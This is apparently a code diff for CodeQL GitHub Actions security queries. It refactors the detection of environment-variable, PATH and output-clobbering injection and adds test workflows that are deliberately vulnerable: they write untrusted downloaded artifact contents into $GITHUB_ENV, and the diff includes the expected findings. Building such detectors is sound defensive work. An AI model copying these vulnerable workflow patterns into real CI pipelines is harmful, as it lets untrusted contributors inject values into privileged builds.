b/ql/lib/codeql/actions/security/ControlChecks.qll index 86de44c3b5c..86c7d989522 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -283,8 +283,8 @@ class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then exists(string cmd1, string cmd2 | - cmd1 = this.getACommand() and - cmd2 = this.getACommand() and + cmd1 = this.getScript().getACommand() and + cmd2 = this.getScript().getACommand() and not cmd1 = cmd2 and cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 1f53c938436..859f625e068 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -25,15 +25,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubPathWrite(cmd) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubPath(run, _) + run.getScript().fileToGitHubPath(_) ) ) } @@ -49,9 +49,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { EnvPathInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) ) } } @@ -67,9 +66,9 @@ class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScript() = this.asExpr() ) } } @@ -90,8 +89,12 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubPathWrite(var) + ) ) or exists(Uses step | @@ -104,8 +107,8 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dd6b8342185..214e97fed6b 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -28,15 +28,15 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubEnv(run, _) + run.getScript().fileToGitHubEnv(_) ) ) } @@ -52,9 +52,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) ) } } @@ -71,8 +70,8 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() and - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) + run.getScript() = this.asExpr() and + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) ) } } @@ -109,8 +108,12 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and - Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + succ.asExpr() = run.getScript() and + ( + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + ) ) or exists(Uses step | @@ -123,8 +126,8 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4f9eeef7579..e959c7d60ca 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -19,7 +19,7 @@ abstract class OutputClobberingSink extends DataFlow::Node { } */ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { - exists(Run run, Step step | + exists(Run run, Step step, string field1, string field2 | ( step instanceof UntrustedArtifactDownloadStep or @@ -31,7 +31,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Uses uses | step = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or step instanceof GitMutableRefCheckout @@ -43,14 +44,28 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step instanceof GhSHACheckout ) and step.getAFollowingStep() = run and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field1) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field1, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + // A write to GITHUB_OUTPUT that is attacker-controlled ( + // echo "sha=$(> $GITHUB_OUTPUT exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubOutputWrite(cmd, field2) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubOutput(run, _) + // cat test-results/.vars >> $GITHUB_OUTPUT + run.getScript().fileToGitHubOutput(_) and + field2 = "UNKNOWN" ) ) } @@ -66,16 +81,24 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var, string field | - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string field2 | - run.getAWriteToGitHubOutput(field2, _) and - not field2 = field + exists(Run run, string field1, string field2 | + // A write to GITHUB_OUTPUT that is attacker-controlled + exists(string var | + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field1) and + exists(run.getInScopeEnvVarExpr(var)) and + run.getScript() = this.asExpr() ) and - exists(run.getInScopeEnvVarExpr(var)) and - run.getScriptScalar() = this.asExpr() + // A write to GITHUB_OUTPUT that is not attacker-controlled + exists(string str | + // The output of a command that is not a file read command + run.getScript().getACmdReachingGitHubOutputWrite(str, field2) and + not str = run.getScript().getAFileReadCommand() + or + // A hard-coded string + run.getScript().getAWriteToGitHubOutput(field2, str) and + str.regexpMatch("[\"'0-9a-zA-Z_\\-]+") + ) and + not field2 = field1 ) } } @@ -97,13 +120,18 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { * echo $BODY */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + string clobbering_var; + string clobbered_value; + WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string clobbering_line, string var_name | - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and - clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + exists(Run run, string workflow_cmd_stmt, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and + clobbering_stmt.regexpMatch("echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + clobbering_var + ".*") and + exists(run.getInScopeEnvVarExpr(clobbering_var)) and + run.getScript().getAStmt() = workflow_cmd_stmt and + clobbered_value = + trimQuotes(workflow_cmd_stmt.regexpCapture(".*::set-output\\s+name=.*::(.*)", 1)) ) } } @@ -133,30 +161,35 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { * echo "::set-output name=OUTPUT::SAFE" */ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + string clobbering_cmd; + WorkflowCommandClobberingFromFileReadSink() { - exists(Run run, string clobbering_line | - run.getScriptScalar() = this.asExpr() and - Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and - run.getACommand() = clobbering_line and + exists(Run run, string clobbering_stmt | + run.getScript() = this.asExpr() and + run.getScript().getAStmt() = clobbering_stmt and ( - // A file is read and its content is assigned to an env var that gets printed to stdout + // A file's content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 00000000000..4241647d3e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml new file mode 100644 index 00000000000..0c205952102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 00000000000..71f590fbc9c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,20 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml new file mode 100644 index 00000000000..e4845a6f2f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -0,0 +1,26 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" + echo "EOF" >> "${GITHUB_ENV}" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml new file mode 100644 index 00000000000..67209267b5c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 00000000000..af9f01b572f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 00000000000..e35bc73c3bd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index aff785242f9..220eaf33663 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | @@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -79,6 +94,11 @@ nodes | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho 